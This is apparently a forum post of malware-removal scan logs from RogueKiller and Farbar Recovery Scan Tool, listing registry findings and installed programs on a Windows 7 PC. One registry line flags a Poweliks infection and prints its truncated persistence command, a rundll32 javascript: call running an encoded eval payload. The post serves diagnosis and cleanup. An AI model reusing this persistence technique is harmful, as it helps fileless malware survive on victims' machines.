Everything posted by rampantfox83

  1. RogueKiller V10.0.5.0 (x64) [Nov 11 2014] by Adlice Software mail : http://www.adlice.com/contact/ Feedback : http://forum.adlice.com Website : http://www.adlice.com/softwares/roguekiller/ Blog : http://www.adlice.com Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version Started in : Normal mode User : Swintal [Administrator] Mode : Scan -- Date : 11/11/2014 21:54:42 ¤¤¤ Processes : 2 ¤¤¤ [Proc.Injected] ekrn.exe -- [x] -> Killed [DrvNtTerm] [Proc.Injected] dllhost.exe -- [x] -> Killed [TermProc] ¤¤¤ Registry : 15 ¤¤¤ [suspicious.Path] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Run | Google+ Auto Backup : "C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart -> Found [suspicious.Path] (X86) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Run | Google+ Auto Backup : "C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 
209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found [PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found [PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found [PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found [PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found [Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Found ¤¤¤ Tasks : 0 ¤¤¤ ¤¤¤ Files : 0 ¤¤¤ ¤¤¤ Hosts File : 0 ¤¤¤ ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤ ¤¤¤ Web browsers : 0 ¤¤¤ ¤¤¤ MBR Check : ¤¤¤ +++++ PhysicalDrive0: +++++ --- User --- [MBR] dd024e018e30dfaad67172ee7859e3c8 [bSP] 7c67bdb6eea5fc037f2fb1fde4966781 : Windows Vista/7/8 MBR Code Partition table: 0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB 1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953767 MB User = 
LL1 ... OK User = LL2 ... OK +++++ PhysicalDrive1: +++++ --- User --- [MBR] 617240ae40078ba5b2d63715af595c39 [bSP] 130a6938a2838fcaeb361cefc3bc8c6d : Windows Vista/7/8 MBR Code Partition table: 0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB User = LL1 ... OK User = LL2 ... OK
  2. Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014 Ran by Swintal at 2014-11-11 21:38:57 Running from C:\Users\Swintal\Desktop Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: ESET Smart Security 8.0 (Enabled - Up to date) {19259FAE-8396-A113-46DB-15B0E7DFA289} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: ESET Smart Security 8.0 (Enabled - Up to date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834} FW: ESET Personal firewall (Enabled) {211E1E8B-C9F9-A04B-6D84-BC85190CE5F2} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) A2A C172 Trainer for FSX (HKLM-x32\...\A2A C172 Trainer for FSX) (Version: - ) ACARS - 1 (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\2acd65cafe4fafc9) (Version: 2.21.0.22 - United Virtual Airlines) ACARS (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\ca11877970cf2b3f) (Version: 2.0.0.48 - United Virtual Airlines) Active Sky Next for FSX SP1B (HKLM-x32\...\{F1AE1E08-5094-46AD-AA4D-670C482723B2}_is1) (Version: 1.0.5410.16208 - HiFi Technologies, Inc.) 
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.223 - Adobe Systems Incorporated) Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated) Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.2.0.3 - Aerosoft) Aerosoft's - Airbus A318-A319 - FSX (HKLM-x32\...\Airbus A318-A319 - FSX) (Version: 1.10 - Aerosoft) Aerosoft's - Airbus A320-A321 - FSX (HKLM-x32\...\Airbus A320-A321 - FSX) (Version: 1.00 - Aerosoft) Aerosoft's - Anchorage X - FSX (HKLM-x32\...\Anchorage X - FSX) (Version: - ) Aerosoft's - Mega Airport Dublin - FSX (HKLM-x32\...\Mega Airport Dublin - FSX) (Version: 1.10 - Aerosoft) Aerosoft's - Mega Airport Duesseldorf - FSX (HKLM-x32\...\Mega Airport Duesseldorf - FSX) (Version: - ) aerosoft's - Mega Airport Frankfurt X (HKLM-x32\...\{BAEE0C24-C8C2-4820-9DF4-887909F1A286}) (Version: 1.04 - aerosoft) Aerosoft's - Mega Airport London Heathrow Xtended - FSX (HKLM-x32\...\Mega Airport London Heathrow Xtended - FSX) (Version: 1.00 - Aerosoft) ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) ASConnect for FSX Installer (HKLM-x32\...\{7E1270D4-42C4-49A4-9EC4-3300D2E47331}_is1) (Version: 1.0.5410.16224 - HiFi Technologies, Inc.) 
Asmedia ASM106x SATA Host Controller Driver (HKLM-x32\...\{61942EF5-2CD8-47D4-869C-2E9A8BB085F1}) (Version: 1.3.4.001 - Asmedia Technology) B1900D HD SERIES FSX/P3D (HKLM-x32\...\B1900D HD SERIES FSX/P3D) (Version: 1.00.00.00 - Carenado) Black ICE 6.21r2945 (HKLM-x32\...\{015E0577-7D4A-456C-A435-DD9EE7E72589}_is1) (Version: 6.21r2945 - Panzeroo, Inc.) bluCARS (HKLM-x32\...\{BD892214-8231-4910-8DBB-F277EE572B15}) (Version: 1.0.1014 - FS Products) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.1.2 - Canon Inc.) CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.9.0.9 - Canon Inc.) Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.8.0.7 - Canon Inc.) Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.6.0.1 - Canon Inc.) Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.7.0.4 - Canon Inc.) Canon Utilities Digital Photo Professional 3.10 (HKLM-x32\...\DPP) (Version: 3.10.2.0 - Canon Inc.) Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.10.2.0 - Canon Inc.) Canon Utilities EOS Video Snapshot Task for ZoomBrowser EX (HKLM-x32\...\EOS Video Snapshot Task) (Version: 1.0.0.10 - Canon Inc.) Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.) Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.9.0.0 - Canon Inc.) Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.7.0.24 - Canon Inc.) Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.5.0.9 - Canon Inc.) 
Cheat Engine 6.4 (HKLM-x32\...\Cheat Engine 6.4_is1) (Version: - Cheat Engine) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Elevated Installer (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden Empire: Total War (HKLM-x32\...\Steam App 10500) (Version: - The Creative Assembly) ESET Smart Security (HKLM\...\{C082CDB9-D173-4740-AE0E-C685E6F44850}) (Version: 8.0.304.0 - ESET, spol s r. o.) Flight Simulator X (HKLM-x32\...\RTMshadow_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version: - ) Flight Simulator X Service Pack 1 (HKLM-x32\...\SP1shadow_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version: - ) FlightBeam Denver FSX (HKLM-x32\...\FlightBeam Denver FSX_is1) (Version: 1.0 - FlightBeam.) FlightBeam San Francisco International FSX (HKLM-x32\...\FlightBeam San Francisco International FSX_is1) (Version: 2.1 - FlightBeam.) FlightBeam Washington Dulles FSX (HKLM-x32\...\FlightBeam Washington Dulles FSX_is1) (Version: 1.2.3 - FlightBeam.) FS Flight Keeper (HKLM-x32\...\{B7057895-A93D-44D6-B87A-D3C1FCF28E01}) (Version: 3.5.1 - Thomas Molitor & Aerosoft GmbH) FSDreamTeam Hawaiian Airports Volume 2 FSX (HKLM-x32\...\FSDreamTeam Hawaiian Airports Volume 2 FSX_is1) (Version: 1.5.1 - VIRTUALI Sagl) FSDreamTeam Honolulu International FSX (HKLM-x32\...\FSDreamTeam Honolulu International FSX_is1) (Version: 1.4 - VIRTUALI s.a.s.) FSDreamTeam Houston Intercontinental Airport FSX (HKLM-x32\...\FSDreamTeam Houston Intercontinental Airport FSX_is1) (Version: 1.0.2 - VIRTUALI Sagl) FSDreamTeam KJFK FSX (HKLM-x32\...\FSDreamTeam KJFK FSX_is1) (Version: 1.3 - VIRTUALI s.a.s.) FSDreamTeam Las Vegas McCarran FSX (HKLM-x32\...\FSDreamTeam Las Vegas McCarran FSX_is1) (Version: 1.3 - VIRTUALI s.a.s.) FSDreamTeam Los Angeles International FSX (HKLM-x32\...\FSDreamTeam Los Angeles International FSX_is1) (Version: 1.5 - VIRTUALI s.a.s.) FSDreamTeam OHareX FSX (HKLM-x32\...\FSDreamTeam OHareX FSX_is1) (Version: 2.3 - VIRTUALI s.a.s.) 
FSFDT FSCopilot (HKLM-x32\...\FSFDT FSCopilot) (Version: - ) FSFDT FSInn (HKLM-x32\...\FSFDT FSInn) (Version: - ) Galeao Intl Airport FSX Prepar3d 2.1 (HKLM-x32\...\sbgl2012fsx) (Version: 2.1 - TropicalSim) Garmin Express (HKLM-x32\...\{817c6bb8-ea2d-4e12-abbc-e33c3de43f64}) (Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Garmin Express (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden Garmin Express Tray (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries) Globe Cargo PIREP (HKLM-x32\...\{93E6FA87-33AD-429C-BE11-F947250FE3BA}) (Version: 3.0.1 - Globe Cargo Virtual Airlines) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.) Google Drive (HKLM-x32\...\{C60F3836-333A-4AE2-B526-CFDBA143A9BA}) (Version: 1.18.7821.2489 - Google, Inc.) Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google) Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden Google+ Auto Backup (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Google+ Auto Backup) (Version: 1.0.26.151 - Google, Inc.) Hearts of Iron III (HKLM-x32\...\Steam App 25890) (Version: - Paradox Development Studio) HP ENVY 4500 series Basic Device Software (HKLM\...\{38A08516-1847-43E4-8076-9540B60EC43B}) (Version: 32.2.188.47710 - Hewlett-Packard Co.) HP ENVY 4500 series Help (HKLM-x32\...\{95BECC50-22B4-4FCA-8A2E-BF77713E6D3A}) (Version: 30.0.0 - Hewlett Packard) HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) iCloud (HKLM\...\{2AAF09D5-4B3F-4975-B6A9-ECE2631FC942}) (Version: 4.0.5.20 - Apple Inc.) 
Intel® Network Connections 18.1.59.0 (HKLM\...\PROSetDX) (Version: 18.1.59.0 - Intel) Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation) iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.) Juniper Networks Host Checker (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Neoteris_Host_Checker) (Version: 7.1.0.20169 - Juniper Networks) Juniper Networks, Inc. Setup Client (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Juniper_Setup_Client) (Version: 7.1.6.17115 - Juniper Networks, Inc.) MacroWorks 3.1 (HKLM-x32\...\MacroWorks 3.1) (Version: - PI Engineering) Majestic MJC8Q400 Version 1.008 (HKLM-x32\...\MJC8Q400) (Version: - ) Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation) Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Flight Simulator X: Acceleration (HKLM-x32\...\FlightSim_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version: 10.0.61637.0 - Microsoft Game Studios) Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation) Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4659.1001 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft SQL Server Compact 3.5 SP1 English (HKLM-x32\...\{E59113EB-0285-4BFD-A37A-B79EAC6B8F4B}) (Version: 3.5.5692.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 
8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 
4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Navigraph FMS Data Manager 1.0.11.0603 (HKLM-x32\...\{7E4D5716-374A-4DB6-90CF-D2AEB67362CE}_is1) (Version: 1.0.11.0603 - Navigraph) Navtech PBS (HKLM-x32\...\{3582DCD8-F0DF-4B2A-808A-2A67BEFEAFA0}) (Version: 14.5.5 - Navtech Inc) NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation) NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation) NVIDIA GeForce Experience 2.1.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.4 - NVIDIA Corporation) NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation) NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation) NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation) Office 15 Click-to-Run Extensibility Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Origin (HKLM-x32\...\Origin) (Version: 9.4.6.2792 - Electronic Arts, Inc.) 
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.3 - pdfforge) Photo Common (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Photo Gallery (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.) PMDG 737 6700 NGX RTM (HKLM-x32\...\{C7EE862A-D83D-4A9F-B746-CBDE39BD7001}) (Version: 1.00.3219 - PMDG Simulations, LLC.) PMDG 737 8900 NGX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.00.3219 - PMDG Simulations, LLC.) PMDG 747-400/400F for FSX (HKLM-x32\...\{EDCEE320-0FB3-4197-9F86-8C1CCF2278FB}) (Version: 2.10.0040 - Precision Manuals Development Group) PMDG 777-200LR/F Base Package FSX (HKLM-x32\...\{0F16340B-5B5B-4531-8D87-4952E3BCA6E6}) (Version: 1.10.6155 - PMDG Simulations, LLC.) PMDG 777-300ER Expansion (HKLM-x32\...\{E65EFDE6-0864-40BA-8DDF-E31F736D9000}) (Version: 1.10.6155 - PMDG Simulations, LLC.) PMDG744X_GE_LH (HKLM-x32\...\{20372FAA-3AF4-4B3D-9B1D-564CDEA5957C}) (Version: 1.00.0000 - Precision Manuals Development Group) PMDG744X_PW_UA2 (HKLM-x32\...\{2B5DDFFF-F347-489E-861D-98D02D00472D}) (Version: 1.10.0000 - Precision Manuals Development Group) PMDG744X_PW_UA3 (HKLM-x32\...\{EAB979F7-84A6-47B6-AB39-CA73A6EEAE69}) (Version: 1.00.0000 - Precision Manuals Development Group) Punta Cana X-Generation FSX v1.0 (HKLM-x32\...\tsimmdpcxx) (Version: - ) QualityWings Ultimate 757 Collection FSX (HKLM-x32\...\QualityWings Ultimate 757 Collection FSX_is1) (Version: 1.3.2 - QualityWings) QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.) RAAS Professional by FS2Crew (LOCKED) (HKLM-x32\...\RAAS Professional by FS2Crew (LOCKED)) (Version: - ) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6923 - Realtek Semiconductor Corp.) Rio Santos Dumont FSX P3D 1.1 (HKLM-x32\...\sbrjfsx) (Version: 1.1 - TropicalSim) RollerCoaster Tycoon 3: Platinum! 
(HKLM-x32\...\Steam App 2700) (Version: - Frontier) SHIELD Streaming (Version: 3.1.2000 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 16.13.65 - NVIDIA Corporation) Hidden SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 2.0.0.0 - Electronic Arts) St Thomas TIST2010 2.0 (HKLM-x32\...\tist2010fsx) (Version: 2.0 - TropicalSim) Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation) The Political Machine 2012 (HKLM-x32\...\Steam App 211120) (Version: - Stardock Entertainment) Tocumen Intl', Panama City FSX 1.0 (HKLM-x32\...\tsimmptoxx) (Version: - ) TOPCAT 2.74 Beta 1 - Take-Off and Landing Performance Calculation Tool (HKLM-x32\...\TOPCAT) (Version: 2.74 Beta 1 - FSS GmbH) Train Simulator 2015 (HKLM-x32\...\Steam App 24010) (Version: - RailSimulator.com) Ultimate General: Gettysburg (HKLM-x32\...\Steam App 306660) (Version: - Game-Labs) UVACARS (HKLM-x32\...\{8FA014EE-A721-428F-89F7-82F7B82D4386}) (Version: 3.3.15 - United Virtual Airlines) VC_CRT_x64 (Version: 1.02.0000 - Intel Corporation) Hidden VIRTUALI Addon ManagerX FSX (HKLM-x32\...\VIRTUALI Addon ManagerX FSX_is1) (Version: 2.9.0.23 - VIRTUALI Sagl) vroute.info (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\ea913c639d7ea423) (Version: 1.1.1.3 - vroute) Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.) 
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin) Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) ZipGenius 6.3 (HKLM-x32\...\{EC3B598C-1151-4191-B5B4-A9072ADE6259}_is1) (Version: 6.3 - Wininizio.it Software) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.) 
==================== Restore Points ========================= 09-11-2014 22:24:34 Installed Navtech PBS 11-11-2014 12:28:51 Windows Update 11-11-2014 12:56:25 Installed DirectX 11-11-2014 16:30:13 Removed bluCARS 11-11-2014 16:32:59 Installed bluCARS 11-11-2014 19:52:02 Installed DirectX 11-11-2014 19:56:23 Removed Professional Flight Planner X 12-11-2014 02:12:03 Restore Operation ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {1CFCAE88-C488-4548-AEA2-F7CCD8E91383} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 